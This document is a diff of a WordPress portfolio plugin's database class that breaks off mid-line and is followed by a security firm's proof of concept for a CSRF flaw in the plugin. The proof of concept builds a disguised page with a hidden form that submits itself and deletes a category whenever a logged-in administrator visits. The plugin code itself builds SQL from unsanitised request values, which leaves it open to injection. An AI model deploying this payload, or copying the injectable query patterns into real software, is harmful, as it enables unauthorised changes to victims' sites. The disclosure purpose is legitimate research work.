-					  `name` varchar(255) NOT NULL DEFAULT '',
-					  `slug` varchar(255) NOT NULL DEFAULT '',
-					  `icon` varchar(255) DEFAULT '',
-					  `description` text DEFAULT '',
-					  `status` varchar(20) NOT NULL DEFAULT 'unpublished',
-					  `doc` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
-
-					  PRIMARY KEY (`id`),
-					  UNIQUE KEY `idx_slug` (`slug`(100)),
-					  KEY `idx_status` (`status`),
-					  KEY `idx_doc` (`doc`)
-					) COMMENT='Portfolio Manager - Powered by Behance Categories' AUTO_INCREMENT=0;";
-			//reference to upgrade.php file
-			require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
-			dbDelta( $sql );
-		}
-	}
-
-	public function create_project_table(){
-		//Creating the project table on actiavation of plugin
-		global $wpdb;
-		$project_table_name = $wpdb->prefix. EDS_BPM_Config::$project_table;
-		$category_table_name = $wpdb->prefix. EDS_BPM_Config::$category_table;
-		if($wpdb->get_var("SHOW TABLES LIKE '$project_table_name'") != $project_table_name)
-		{
-			$sql = "CREATE TABLE $project_table_name (
-					  	`id` integer(10) UNSIGNED NOT NULL auto_increment,
-					  	`catid` integer NOT NULL default '0',
-					  	`slug` varchar (255) NOT NULL DEFAULT '',
-					  	`b_project_id`  varchar(20) NOT NULL DEFAULT '',
-					  	`b_project_url`  varchar(255) NULL DEFAULT '',
-					  	`b_project_name` varchar (255) NOT NULL DEFAULT '',
- 					   	`b_project_thumb` varchar (255) NOT NULL DEFAULT '',
- 						`b_creative_fields` varchar(255) NOT NULL DEFAULT '',
- 						`b_create_date` datetime NOT NULL default '0000-00-00 00:00:00',
- 						`b_modified_timestamp` integer NOT NULL default '0',
- 						`params` text NOT NULL default '',
-					  	`status` varchar(20) NOT NULL DEFAULT 'unpublished',
-					  	`featured` tinyint NOT NULL default '0',
-					  	`doc` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
-					  	PRIMARY KEY (`id`),
-					  	UNIQUE KEY `idx_slug` (`slug`(100)),
-					  	KEY `idx_b_prjct_id` (`b_project_id`),
-   						KEY `idx_status` (`status`),
-   						KEY `idx_catid` (`catid`),
-					  	KEY `idx_doc` (`doc`)
-					) COMMENT='Portfolio Manager - Powered by Behance Projects' AUTO_INCREMENT=0;";
-			//reference to upgrade.php file
-			require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
-			dbDelta( $sql );
-		}
-
-	}
-
-	public function create_default_category(){
-		try{
-			global $wpdb;
-
-			$table_name = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$row = $wpdb->get_row("SELECT * FROM $table_name WHERE slug='default'", OBJECT, 0);
-
-			if($row != NULL)
-				return;
-
-			$default_cat_icon = plugin_dir_url(__FILE__).'../images/default-category-icon.jpg';
-
-			$wpdb->insert
-			(
-				$table_name,
-				array(
-				            'name' => 'Default',
-							'slug' => 'default',
-				            'icon' => $default_cat_icon,
-				        	'description' => 'Default Category',
-				        	'status' => 'published',
-				        	'doc' =>  date("Y-m-d H:i:s")
-				),
-				array(
-				            '%s',
-				            '%s',
-							'%s',
-				        	'%s',
-				        	'%s',
-			        		'%s'
-				)
-			);
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-
-	//Function to update databse on version change
-	public function update_database() {
-		try{
-			global $wpdb;
-			$behance = new EDS_BPM_Behance();
-
-			$project_table_name = $wpdb->prefix. EDS_BPM_Config::$project_table;
-				$sql = "CREATE TABLE $project_table_name (
-					  	`id` integer(10) UNSIGNED NOT NULL auto_increment,
-					  	`catid` integer NOT NULL default '0',
-					  	`slug` varchar (255) NOT NULL DEFAULT '',
-					  	`b_project_id`  varchar(20) NOT NULL DEFAULT '',
-					  	`b_project_url`  varchar(255) NULL DEFAULT '',
-					  	`b_project_name` varchar (255) NOT NULL DEFAULT '',
- 					   	`b_project_thumb` varchar (255) NOT NULL DEFAULT '',
- 						`b_creative_fields` varchar(255) NOT NULL DEFAULT '',
- 						`b_create_date` datetime NOT NULL default '0000-00-00 00:00:00',
- 						`b_modified_timestamp` integer NOT NULL default '0',
- 						`params` text NOT NULL default '',
-					  	`status` varchar(20) NOT NULL DEFAULT 'unpublished',
-					  	`featured` tinyint NOT NULL default '0',
-					  	`doc` datetime NOT NULL DEFAULT '0000-00-00 00:00:00'
-				);";
-
-				require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
-
-				dbDelta( $sql );
-
-				$projects = $this->get_all_projects( array( 'id', 'b_project_id' ) );
-
-				if( $projects != null ){
-					$flag = true;
-
-					foreach($projects as $project){
-
-						$be_response = $behance->get_behance_project( $project->b_project_id );
-
-						$b_pr_data = $be_response->data;
-						$status = $be_response->status;
-						$msg = $be_response->msg;
-						if($status=='S')
-							$flag = $flag & $this->_temp_update_project_url($project, $b_pr_data);
-						else{
-							$flag = false;
-						}
-					}
-					return $flag;
-
-				} else {
-					return false;
-				}
-
-		}catch ( Exception $e ) {
-			return false;
-		}
-
-	}
-
-	public function get_all_projects( $columns ) {
-
-		try{
-
-			global $wpdb;
-
-			$table_name = $wpdb->prefix. EDS_BPM_Config::$project_table;
-
-			$columns_list = implode(" , ", $columns);
-
-			$query = "SELECT $columns_list FROM `$table_name` ";
-
-			return $wpdb->get_results( $query ,OBJECT );
-
-		} catch(Exception $e ){
-			return false;
-		}
-
-	}
-
-
-	private function _temp_update_project_url($project, $b_pr_data){
-		try{
-
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-			$response = $wpdb->update(
-				$tableName,
-				array('b_project_url' => $b_pr_data['url']),
-				array('id' => $project->id),
-				array('%s'),
-				array( '%d')
-			);
-
-			return true;
-
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-
-	public function get_categories($filters){
-		try{
-			global $wpdb;
-
-			$response = new stdClass();
-
-			$queries = $this->get_category_query($filters);
-
-			$response->rows = $wpdb->get_results( $queries->category_query ,OBJECT );
-			$response->total_rows = ($wpdb->get_col($queries->count_query, 0));
-
-			return $response;
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	private function get_category_query($filters){
-		try{
-			global $wpdb;
-
-			$counter = 0;
-			$where_clause = array();
-
-			$category_table = $wpdb->prefix .EDS_BPM_Config::$category_table;
-
-			$query = "SELECT * FROM `$category_table` ";
-			$count_query = "SELECT count(*) as total FROM `$category_table` ";
-
-			if($filters->get_filter_category()!=null && $filters->get_filter_category()!=-1)
-				$where_clause[$counter++] = " name LIKE ('%" . $filters->get_filter_category() . "%')";
-
-			if($filters->get_filter_status()!=null)
-			$where_clause[$counter++] = " status = '" . $filters->get_filter_status() . "'";
-			else
-			$where_clause[$counter++] = " status != 'deleted'";
-
-			$order_by_clause = " ORDER BY " . $filters->get_order_by(). " " . $filters->get_ordering();
-
-			$limit_clause = " LIMIT ".(($filters->get_page_number() - 1) * intval(EDS_BPM_Config::$result_per_page)).",". EDS_BPM_Config::$result_per_page;
-
-			if($counter != 0)
-			{
-				$query .= " WHERE " . implode(' AND ', $where_clause);
-				$count_query .= " WHERE " . implode(' AND ', $where_clause);
-			}
-
-			$query .= $order_by_clause;
-			$query .= $limit_clause;
-
-			$queries = new stdClass();
-
-			$queries->category_query = $query;
-			$queries->count_query = $count_query;
-
-
-			return $queries;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	public function get_category_details($cat_id){
-		try{
-			global $wpdb;
-			$category_table = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$query = $wpdb->prepare("SELECT * FROM `$category_table` WHERE id = %d" , $cat_id);
-
-			$category = $wpdb->get_row($query, OBJECT);
-
-			return $category;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-
-	public function save_category(){
-		try{
-			global $wpdb;
-			$category_table = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$category_slug = $this->get_slug("category",$_REQUEST['cat-name']);
-
-			$response = true;
-
-			// Adding/Updating the Category Table
-			$id = intval($_REQUEST['bpm-id']);
-
-			if($id == 0 ){
-				$response = $wpdb->insert(
-				$category_table,
-				array(
-					            'name' => $_REQUEST['cat-name'],
-								'slug' => $category_slug,
-								'icon' => $_REQUEST['cat-icon'],
-								'description' => $_REQUEST['cat-desc'],
-					        	'status' => 'published',
-					        	'doc' => date("Y-m-d H:i:s")
-				),
-				array(
-					            '%s',
-								'%s',
-								'%s',
-								'%s',
-					        	'%s',
-					        	'%s'
-				));
-			}
-			else{
-				$response = $wpdb->update(
-				$category_table,
-				array(
-					            'name' => $_REQUEST['cat-name'],
-								'slug' => $category_slug,
-								'icon' => $_REQUEST['cat-icon'],
-								'description' => $_REQUEST['cat-desc'],
-				),
-				array(
-								'id' => $id
-				),
-				array(
-					        	'%s',
-								'%s',
-								'%s',
-								'%s'
-				),
-				array( '%d'));
-
-			}
-
-			return true;
-
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	private function get_slug($type , $text){
-		try{
-			global $wpdb;
-			$table = '';
-			switch($type){
-				case "category":
-					$table = $wpdb->prefix . EDS_BPM_Config::$category_table;
-				break;
-
-				case "project":
-					$table = $wpdb->prefix . EDS_BPM_Config::$project_table;
-				break;
-			}
-
-			//$name = strtolower(trim($text));
-			//$slug = str_replace(" ","-", $name);
-			$slug = $this->convert_to_slug($text);
-			$new_slug = $slug;
-
-			$count_query = "SELECT count(*) as total FROM `$table` WHERE slug ='$slug'";
-			$total_rows = ($wpdb->get_col($count_query, 0));
-			$counter = 1;
-			while($total_rows[0]){
-				$new_slug = $slug.'-'.$counter++;
-				$count_query = "SELECT count(*) as total FROM `$table` WHERE slug ='$new_slug'";
-				$total_rows = ($wpdb->get_col($count_query, 0));
-			}
-
-			return $new_slug;
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	private function convert_to_slug($str, $replace=array(), $delimiter='-'){
-		setlocale(LC_ALL, 'en_US.UTF8');
-		if( !empty($replace) ) {
-			$str = str_replace((array)$replace, ' ', $str);
-		}
-		$str = urldecode($str);
-		$clean = iconv('UTF-8', 'ASCII//TRANSLIT', $str);
-		$clean = preg_replace("%[^-/+|w ]%", '', $clean);
-		$clean = strtolower(trim($clean, '-'));
-		$clean = preg_replace("/[/_|+ -]+/", $delimiter, $clean);
-
-		return $clean;
-	}
-
-
-
-	public function publish_category(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'published' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function unpublish_category(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'unpublished' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function delete_category(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'deleted' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-
-	public function trash_category(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("DELETE FROM `$tableName` WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-
-
-	public function get_projects($filters){
-		try{
-			global $wpdb;
-
-			$response = new stdClass();
-
-			$queries = $this->get_project_query($filters);
-
-			$response->rows = $wpdb->get_results( $queries->project_query ,OBJECT );
-			$response->total_rows = ($wpdb->get_col($queries->count_query, 0));
-			$response->category_list = $this->get_category_list('published');
-
-			return $response;
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	private function get_project_query($filters){
-		try{
-			global $wpdb;
-
-			$counter = 0;
-			$where_clause = array();
-
-
-			$project_table = $wpdb->prefix .EDS_BPM_Config::$project_table;
-			$category_table = $wpdb->prefix .EDS_BPM_Config::$category_table;
-
-			$query = "SELECT * FROM `$project_table` p INNER JOIN (SELECT id AS cat_id, name AS cat_name FROM `$category_table`) c ON p.catid = c.cat_id ";
-
-			$count_query = "SELECT count(*) as total FROM `$project_table` p INNER JOIN (SELECT id AS cat_id, name AS cat_name FROM `$category_table`) c ON p.catid = c.cat_id ";
-
-			if($filters->get_filter_pname()!=null && $filters->get_filter_pname()!='')
-			{
-				if(is_numeric(trim($filters->get_filter_pname())))
-					$where_clause[$counter++] = " p.b_project_id = '" . trim($filters->get_filter_pname()) . "'";
-				else
-					$where_clause[$counter++] = " p.b_project_name LIKE ('%" . $filters->get_filter_pname() . "%')";
-			}
-
-
-			if($filters->get_filter_pcategory()!=null && $filters->get_filter_pcategory()!=-1)
-				$where_clause[$counter++] = " c.cat_id = ". $filters->get_filter_pcategory();
-
-			if($filters->get_filter_pstatus()!=null)
-			{
-				if($filters->get_filter_pstatus()!='featured')
-					$where_clause[$counter++] = " p.status = '" . $filters->get_filter_pstatus() . "'";
-				else
-					$where_clause[$counter++] = " p.featured = 1";
-			}
-			else
-				$where_clause[$counter++] = " p.status != 'deleted'";
-
-
-			$order_by_clause = " ORDER BY " . $filters->get_order_by(). " " . $filters->get_ordering();
-
-			$limit_clause = " LIMIT ".(($filters->get_page_number() - 1) * intval(EDS_BPM_Config::$result_per_page)).",". EDS_BPM_Config::$result_per_page;
-
-			if($counter != 0)
-			{
-				$query .= " WHERE " . implode(' AND ', $where_clause);
-				$count_query .= " WHERE " . implode(' AND ', $where_clause);
-			}
-
-			$query .= $order_by_clause;
-			$query .= $limit_clause;
-
-			$queries = new stdClass();
-
-			$queries->project_query = $query;
-			$queries->count_query = $count_query;
-
-
-			return $queries;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-
-	public function get_category_list($status){
-		try{
-			global $wpdb;
-			$category_table = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$query = '';
-
-			if($status != null)
-				$query = $wpdb->prepare("SELECT * FROM `$category_table` WHERE status = %s" , $status);
-			else
-				$query = $wpdb->prepare("SELECT * FROM `$category_table`");
-
-			$category_list = $wpdb->get_results($query, OBJECT);
-
-			return $category_list;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	public function save_project(){
-		try{
-			global $wpdb;
-			$project_table = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$b_project_name = stripslashes( $_REQUEST['b_project_name'] );
-			$project_slug = $this->get_slug("project", $_REQUEST["b_project_name"]);
-
-			$response = true;
-
-			// Adding/Updating the Category Table
-			$id = intval($_REQUEST['bpm-id']);
-
-			if($id == 0 ){
-				$response = $wpdb->insert(
-				$project_table,
-				array(
-								'catid' => $_REQUEST['bpm-project-category'],
-								'slug' => $project_slug,
-					            'b_project_id' => $_REQUEST['b_project_id'],
-								'b_project_url' => substr( $_REQUEST['b_project_url'], 1, -1),
-								'b_project_name' => $b_project_name,
-								'b_project_thumb' => substr( $_REQUEST['b_project_thumb'], 1, -1),
-								'b_creative_fields' => $_REQUEST['b_creative_fields'],
-								'b_create_date' => $_REQUEST['b_create_date'],
-								'b_modified_timestamp' => $_REQUEST['b_modified_timestamp'],
-								'params' => '',
-					        	'status' => $_REQUEST['bpm-project-status'],
-								'featured' => 0,
-					        	'doc' => date("Y-m-d H:i:s")
-				),
-				array(
-					            '%d',
-								'%s',
-								'%s',
-								'%s',
-								'%s',
-					        	'%s',
-					        	'%s',
-					        	'%s',
-								'%s',
-								'%s',
-					        	'%s',
-					        	'%d',
-								'%s'
-				));
-			}
-			else{
-				$response = $wpdb->update(
-				$project_table,
-				array(
-					            'catid' => $_REQUEST['bpm-project-category'],
-								'slug' => $project_slug,
-					            'b_project_id' => $_REQUEST['b_project_id'],
-								'b_project_url' => substr( $_REQUEST['b_project_url'] , 1, -1),
-								'b_project_name' => $b_project_name,
-								'b_project_thumb' => substr( $_REQUEST['b_project_thumb'], 1, -1 ),
-								'b_creative_fields' => $_REQUEST['b_creative_fields'],
-								'b_create_date' => $_REQUEST['b_create_date'],
-								'b_modified_timestamp' => $_REQUEST['b_modified_timestamp'],
-								'params' => '',
-					        	'status' => $_REQUEST['bpm-project-status'],
-								'featured' => 0
-				),
-				array(
-								'id' => $id
-				),
-				array(
-					        	'%d',
-								'%s',
-								'%s',
-								'%s',
-								'%s',
-					        	'%s',
-					        	'%s',
-					        	'%s',
-								'%s',
-								'%s',
-					        	'%s',
-					        	'%d'
-				),
-				array( '%d'));
-
-			}
-
-			return true;
-
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function get_project_details($project_id){
-		try{
-			global $wpdb;
-			$project_table = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$query = $wpdb->prepare("SELECT * FROM `$project_table` WHERE id = %d" , $project_id);
-
-			$project = $wpdb->get_row($query, OBJECT);
-
-			return $project;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	public function publish_project(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'published' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-
-	}
-
-	public function unpublish_project(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'unpublished' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-
-	}
-
-	public function set_project_featured($flag){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET featured = $flag WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function delete_project(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("UPDATE `$tableName` SET status = 'deleted' WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function trash_project(){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$ids = $_REQUEST['entries'];
-
-			$wpdb->query("DELETE FROM `$tableName` WHERE id IN (".implode(",", $ids).")");
-
-			return true;
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function update_project($project, $b_pr_data){
-		try{
-			global $wpdb;
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$b_project_thumb = '';
-			if(isset($b_pr_data['covers']['404']) && trim($b_pr_data['covers']['404']) != '')
-				$b_project_thumb = $b_pr_data['covers']['404'];
-			else if (isset($b_pr_data['covers']['230']) && trim($b_pr_data['covers']['230']) != '')
-				$b_project_thumb = $b_pr_data['covers']['230'];
-			else if (isset($b_pr_data['covers']['202']) && trim($b_pr_data['covers']['202']) != '')
-				$b_project_thumb = $b_pr_data['covers']['202'];
-			else if (isset($b_pr_data['covers']['115']) && trim($b_pr_data['covers']['115']) != '')
-				$b_project_thumb = $b_pr_data['covers']['115'];
-			else
-				$b_project_thumb = plugin_dir_url(__FILE__).'../images/default-project-thumb.jpg';
-
-			$b_fields ='';
-			foreach ($b_pr_data['fields'] as $b_field){
-				$b_fields = $b_fields. ', ' . $b_field;
-			}
-
-
-			$project_slug = $this->get_slug("project", $b_pr_data['name']);
-
-			$response = $wpdb->update(
-			$tableName,
-			array(
-							'slug' => $project_slug,
-				            'b_project_id' => $b_pr_data['id'],
-							'b_project_url' => $b_pr_data['url'],
-							'b_project_name' => $b_pr_data['name'],
-							'b_project_thumb' => $b_project_thumb,
-							'b_creative_fields' => substr($b_fields, 2),
-							'b_create_date' => date('Y-m-d H:i:s', $b_pr_data['created_on']),
-							'b_modified_timestamp' => $b_pr_data['modified_on']
-			),
-			array(
-							'id' => $project->id
-			),
-			array(
-				        	'%s',
-							'%s',
-							'%s',
-							'%s',
-							'%s',
-				        	'%s',
-				        	'%s',
-				        	'%s'
-			),
-			array( '%d'));
-
-
-
-			return true;
-
-		}catch(Exception $e){
-			return false;
-		}
-	}
-
-	public function get_project_list(){
-		try{
-			global $wpdb;
-			$project_table = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			$query = "SELECT id, b_project_name as name FROM `$project_table` WHERE status = 'published'";
-
-			$project_list = $wpdb->get_results($query, ARRAY_A );
-
-			return $project_list;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	public function get_layout_category_list(){
-		try{
-			global $wpdb;
-			$category_table = $wpdb->prefix . EDS_BPM_Config::$category_table;
-
-			$query = "SELECT id, name FROM `$category_table` WHERE status = 'published'";
-
-			$category_list = $wpdb->get_results($query, ARRAY_A );
-
-			return $category_list;
-
-		}catch(Exception $e){
-			return null;
-		}
-	}
-
-	public function save_imported_projects( $projects, $mappings) {
-
-		try{
-
-			global $wpdb;
-
-			$tableName = $wpdb->prefix . EDS_BPM_Config::$project_table;
-
-			//getting the existing projects
-			$existingProjects = $wpdb->get_results( "SELECT `b_project_id`, `id` FROM $tableName", 'OBJECT_K' );
-
-			$values = array();
-			$place_holders = array();
-
-			$query = "INSERT INTO $tableName ( `id`, `catid`, `slug`, `b_project_id`, `b_project_url`, `b_project_name`, `b_project_thumb`, `b_creative_fields`, `b_create_date`, `b_modified_timestamp`, `params`, `status`, `featured`, `doc` ) VALUES ";
-
-			$onDuplicateStatement = " ON DUPLICATE KEY UPDATE catid=VALUES(catid), slug=VALUES(slug), b_project_id=VALUES(b_project_id), b_project_url=VALUES(b_project_url), b_project_name=VALUES(b_project_name), b_project_thumb=VALUES(b_project_thumb), b_creative_fields=VALUES(b_creative_fields), b_create_date=VALUES(b_create_date), b_modified_timestamp=VALUES(b_modified_timestamp) ";
-
-			$counter = ( isset($existingProjects) && !empty($existingProjects) ) ? count($existingProjects): 0;
-
-			foreach ($projects as $key => $project ) {
-
-				$category = $mappings[$project["id"]];
-
-				$b_project_thumb = '';
-
-				if(isset($project['covers']['404']) && trim($project['covers']['404']) != '')
-					$b_project_thumb = $project['covers']['404'];
-				else if (isset($project['covers']['230']) && trim($project['covers']['230']) != '')
-					$b_project_thumb = $project['covers']['230'];
-				else if (isset($project['covers']['202']) && trim($project['covers']['202']) != '')
-					$b_project_thumb = $project['covers']['202'];
-				else if (isset($project['covers']['115']) && trim($project['covers']['115']) != '')
-					$b_project_thumb = $project['covers']['115'];
-				else
-					$b_project_thumb = plugin_dir_url(__FILE__).'../images/default-project-thumb.jpg';
-
-				$b_fields ='';
-
-				foreach ($project['fields'] as $b_field){
-					$b_fields = $b_fields. ', ' . $b_field;
-				}
-
-				$project_slug = $this->get_slug("project", $project['name']);
-
-				$existingProjectId = isset($existingProjects[$project["id"]]) ? $existingProjects[$project["id"]]->id: null;
-
-				array_push($values, $existingProjectId,
-									$category,
-									$project_slug,
-									$project["id"],
-									$project["url"],
-									$project["name"],
-									$b_project_thumb,
-									substr($b_fields, 2),
-									date('Y-m-d H:i:s', $project['created_on']),
-									$project['modified_on'],
-									'',
-									'published',
-									0,
-									date("Y-m-d H:i:s", time() + ++$counter ));
-
-				$place_holders[] = "('%d','%d','%s','%s','%s','%s','%s','%s','%s','%s','%s','%s','%d','%s')";
-
-			}
-
-			// Then add these bits to the initial query:
-			$query .= implode(', ', $place_holders);
-
-			$query .= $onDuplicateStatement;
-
-			if($wpdb->query( $wpdb->prepare("$query ", $values)))
-			{
-				return true;
-			} else
-			{
-				return false;
-			}
-
-		}catch(Exception $e){
-			return false;
-		}
-	}
-}
+<?php
+
+if ( ! defined( 'WPINC' ) ) {
+	die;
+}
+include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-behance.php';
+include_once EDS_BPM_Loader::$abs_path. '/classes/eds-bpm-config.php';
+
+if(!class_exists("EDS_BPM_DB")){
+class EDS_BPM_DB{
+
+	public function create_category_table(){
+		//Creating the category table on activation of plugin
+		global $wpdb;
+		$table_name = $wpdb->prefix . EDS_BPM_Config::$category_table;
+		if($wpdb->get_var("SHOW TABLES LIKE '$table_name'") != $table_name)
+		{
+			$sql = "CREATE TABLE $table_name (
+					  `id` integer(10) UNSIGNED NOT NULL auto_increment,
+					  `name` varchar(255) NOT NULL DEFAULT '',
+					  `slug` varchar(255) NOT NULL DEFAULT '',
+					  `icon` varchar(255) DEFAULT '',
+					  `description` text DEFAULT '',
+					  `status` varchar(20) NOT NULL DEFAULT 'unpublished',
+					  `doc` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
+
+					  PRIMARY KEY (`id`),
+					  UNIQUE KEY `idx_slug` (`slug`(100)),
+					  KEY `idx_status` (`status`),
+					  KEY `idx_doc` (`doc`)
+					) COMMENT='Portfolio Manager - Powered by Behance Categories' AUTO_INCREMENT=0;";
+			//reference to upgrade.php file
+			require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
+			dbDelta( $sql );
+		}
+	}
+
+	public function create_project_table(){
+		//Creating the project table on actiavation of plugin
+		global $wpdb;
+		$project_table_name = $wpdb->prefix. EDS_BPM_Config::$project_table;
+		$category_table_name = $wpdb->prefix. EDS_BPM_Config::$category_table;
+		if($wpdb->get_var("SHOW TABLES LIKE '$project_table_name'") != $project_table_name)
+		{
+			$sql = "CREATE TABLE $project_table_name (
+					  	`id` integer(10) UNSIGNED NOT NULL auto_increment,
+					  	`catid` integer NOT NULL default '0',
+					  	`slug` varchar (255) NOT NULL DEFAULT '',
+					  	`b_project_id`  varchar(20) NOT NULL DEFAULT '',
+					  	`b_project_url`  varchar(255) NULL DEFAULT '',
+					  	`b_project_name` varchar (255) NOT NULL DEFAULT '',
+ 					   	`b_project_thumb` varchar (255) NOT NULL DEFAULT '',
+ 						`b_creative_fields` varchar(255) NOT NULL DEFAULT '',
+ 						`b_create_date` datetime NOT NULL default '0000-00-00 00:00:00',
+ 						`b_modified_timestamp` integer NOT NULL default '0',
+ 						`params` text NOT NULL default '',
+					  	`status` varchar(20) NOT NULL DEFAULT 'unpublished',
+					  	`featured` tinyint NOT NULL default '0',
+					  	`doc` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
+					  	PRIMARY KEY (`id`),
+					  	UNIQUE KEY `idx_slug` (`slug`(100)),
+					  	KEY `idx_b_prjct_id` (`b_project_id`),
+   						KEY `idx_status` (`status`),
+   						KEY `idx_catid` (`catid`),
+					  	KEY `idx_doc` (`doc`)
+					) COMMENT='Portfolio Manager - Powered by Behance Projects' AUTO_INCREMENT=0;";
+			//reference to upgrade.php file
+			require_once( ABSPATH . 'wp-admin/includes/upgrade.php' );
+			dbDelta( $sql );
+		}
+
+	}
+
+	public function create_default_category(){
+		try{
+			glo

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-59137 - Behance Portfolio Manager <= 1.7.5 - Cross-Site Request Forgery

<?php
/**
 * Proof of Concept for CVE-2025-59137
 * Behance Portfolio Manager WordPress Plugin CSRF Vulnerability
 * 
 * This script demonstrates how an attacker could exploit the missing nonce validation
 * to perform unauthorized category deletion via CSRF.
 * 
 * Requirements:
 * - Target site must have Behance Portfolio Manager <= 1.7.5 installed
 * - Victim must be logged into WordPress as administrator
 * - Victim must visit the malicious page containing this exploit
 */

$target_url = 'http://vulnerable-wordpress-site.com/wp-admin/admin.php';

// CSRF payload to delete a category
$csrf_payload = array(
    'page' => 'eds-bpm-cat-menu',           // Plugin's category management page
    'action' => 'delete',                   // Vulnerable action parameter
    'category_id' => '1',                   // ID of category to delete
    'bulk-action' => '-1',                  // WordPress bulk action parameter
    'paged' => '1',                         // Pagination parameter
    's' => ''                               // Search parameter
);

// Generate the malicious HTML form
$html_form = <<<HTML
<!DOCTYPE html>
<html>
<head>
    <title>Benign Looking Page</title>
    <style>
        body { font-family: Arial, sans-serif; padding: 20px; }
        .hidden-form { display: none; }
    </style>
</head>
<body>
    <h1>Interesting Portfolio Example</h1>
    <p>This page demonstrates creative portfolio designs. Please wait while loading...</p>
    
    <!-- Hidden form that auto-submits to exploit the vulnerability -->
    <form id="csrf-exploit" class="hidden-form" method="POST" action="{$target_url}">
        <input type="hidden" name="page" value="eds-bpm-cat-menu">
        <input type="hidden" name="action" value="delete">
        <input type="hidden" name="category_id" value="1">
        <input type="hidden" name="bulk-action" value="-1">
        <input type="hidden" name="paged" value="1">
        <input type="hidden" name="s" value="">
    </form>
    
    <script>
        // Auto-submit the form after page load
        window.onload = function() {
            setTimeout(function() {
                document.getElementById('csrf-exploit').submit();
            }, 2000);
        };
    </script>
</body>
</html>
HTML;

// For demonstration purposes, we'll show the form structure
// In a real attack, this would be served as a complete HTML page
echo "CSRF Exploit Form Structure:n";
echo "Target URL: {$target_url}n";
